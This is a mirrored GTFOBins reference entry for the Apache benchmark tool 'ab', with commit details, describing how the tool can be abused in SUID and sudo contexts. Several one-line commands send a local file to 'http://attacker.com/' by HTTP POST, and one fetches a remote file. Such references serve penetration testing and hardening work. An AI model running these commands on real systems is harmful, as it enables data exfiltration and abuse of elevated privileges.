1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/ab.md
nikip72 e357d8f73f
Add ab
Co-authored-by: Nikola Pepelishev <nikola.pepelishev@azdio.com>
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-01-16 05:37:43 +01:00

809 B

functions
file-upload file-download suid sudo
description code
Upload local file via HTTP POST request. URL=http://attacker.com/ LFILE=file_to_send ab -p $LFILE $URL
description code
Fetch a remote file via HTTP GET request. The response is returned as part of the verbose output of the program with some limitations on the length. URL=http://attacker.com/file_to_download ab -v2 $URL
description code
Upload local file via HTTP POST request. URL=http://attacker.com/ LFILE=file_to_send ./ab -p $LFILE $URL
description code
Upload local file via HTTP POST request. URL=http://attacker.com/ LFILE=file_to_send sudo ab -p $LFILE $URL